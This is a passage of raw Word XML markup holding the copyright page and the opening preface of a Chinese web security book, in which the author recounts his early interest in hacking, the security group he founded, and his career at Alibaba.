          <w:spacing w:val="-48"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>次印刷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="745" w:val="left" w:leader="none"/>
          <w:tab w:pos="2051" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="227" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>印</w:t>
        <w:tab/>
        <w:t>数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>册</w:t>
        <w:tab/>
        <w:t>定价：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>69.00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="290" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="99" w:firstLine="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>凡所购买电子工业出版社图书有缺损问题，请向购买书店调换。若书店售缺，请与本社发行部联系， 联系及邮购电话：（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>88254888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="292" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="563" w:right="1193" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>质量投诉请发邮件至 </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>zlts@phei.com.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>，盗版侵权举报请发邮件至 </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>dbqq@phei.com.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。服务热线：（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>88258888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="292" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="134"/>
      </w:pPr>
      <w:bookmarkStart w:name="加入阿里巴巴" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="c前言（11-474）" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>前言</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="57"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="220" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2010 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年年中的时候，博文视点的张春雨先生找到我，希望我可以写一本关于云计算安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>全的书。当时云计算的概念正如日中天，但市面上关于云计算安全应该怎么做却缺乏足够的资</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>料。我由于工作的关系接触这方面比较多，但考虑到云计算的未来尚未清晰，以及其他的种种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>原因，婉拒了张春雨先生的要求，转而决定写一本关于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>安全的书。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>我的安全之路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>我对安全的兴趣起源于中学时期。当时在盗版市场买到了一本没有书号的黑客手册，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>coolfire</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-3"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>的黑客教程令我印象深刻。此后在有限的能接触到互联网的机会里，我总会想方设法地寻找一些黑客教程，并以实践其中记载的方法为乐。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2000 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年的时候，我进入了西安交通大学学习。在大学期间，最大的收获，是学校的计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>算机实验室平时会对学生开放。当时上网的资费仍然较贵，父母给我的生活费里，除了留下必</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>要的生活所需费用之外，几乎全部投入在这里。也是在学校的计算机实验室里，让我迅速在这个领域中成长起来。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>大学期间，在父母的资助下，我拥有了自己的第一台个人电脑，这加快了我成长的步伐。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>与此同时，我和一些互联网上志同道合的朋友，一起建立了一个技术型的安全组织，名字来源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>于我当时最喜爱的一部动漫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>：“幻影旅团”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。历经十余载，“幻影”由于种种原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>未能得以延续，但它却曾以论坛的形式培养出了当今安全行业中非常多的顶尖人才。这也是我在这短短二十余载人生中的最大成就与自豪。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="220" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>得益于互联网的开放性，以及我亲手缔造的良好技术交流氛围，我几乎见证了全部互联网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>安全技术的发展过程。在前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>年，我投入了大量精力研究渗透测试技术、缓冲区溢出技术、网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>络攻击技术等；而在后 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>年，出于工作需要，我把主要精力放在了对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>安全的研究上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="116"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>加入阿里巴巴</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="44" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>发生这种专业方向的转变，是因为在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2005 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年，我在一位挚友的推荐下，加入了阿里巴巴。加入的过程颇具传奇色彩，在面试的过程中主管要求我展示自己的能力，于是我远程关闭了阿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1048;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,11.754375pt" to="158.16pt,11.754375pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="1" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark0" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="_bookmark0" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>oolfire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>，真名林正隆，台湾著名黑客，中国黑客文化的先驱者。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="141"/>
        <w:ind w:left="203" w:right="221"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>里巴巴内网上游运营商的一台路由设备，导致阿里巴巴内部网络中断。事后主管立即要求与运营商重新签订可用性协议。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>大学时期的兴趣爱好，居然可以变成一份正经的职业</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（当时很多大学都尚未开设网络安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>的课程与专业</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，这使得我的父母很震惊，同时也更坚定了我自己以此作为事业的想法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>在阿里巴巴我很快就崭露头角，曾经在内网中通过网络嗅探捕获到了开发总监的邮箱密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>码；也曾经在压力测试中一瞬间瘫痪了公司的网络；还有好几次，成功获取到了域控服务器的权限，从而可以以管理员的身份进入任何一位员工的电脑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>但这些工作成果，都远远比不上那厚厚的一摞网站安全评估报告让我更有成就感，因为我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>知道，网站上的每一个漏洞，都在影响着成千上万的用户。能够为百万、千万的互联网用户服务，让我倍感自豪。当时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>正在逐渐成为互联网的核心，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>安全技术也正在兴起，于是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>我义无返顾地投入到对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>安全的研究中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="154"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>我于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2007 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>23 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>岁之龄成为了阿里巴巴集团最年轻的技术专家。虽未有官方统计，但可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="73"/>
        <w:ind w:left="203" w:right="187"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>能也是全集团里最年轻的高级技术专家，我于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2010 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年获此殊荣。在阿里巴巴，我有幸见证了安全部门从无到有的建设过程。同时由于淘宝、支付宝草创，尚未建立自己的安全团队，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>我有幸参与了淘宝、支付宝的安全建设，为他们奠定了安全开发框架、安全开发流程的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>对互联网安全的思考</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="125" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>当时，我隐隐地感觉到了互联网公司安全，与传统的网络安全、信息安全技术的区别。就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>如同开发者会遇到的挑战一样，有很多问题，不放到一个海量用户的环境下，是难以暴露出来的。由于量变引起质变，所以管理 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>台服务器，和管理 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>万台服务器的方法肯定会有所区别；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="225"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>同样的，评估 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>名工程师的代码安全，和评估 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
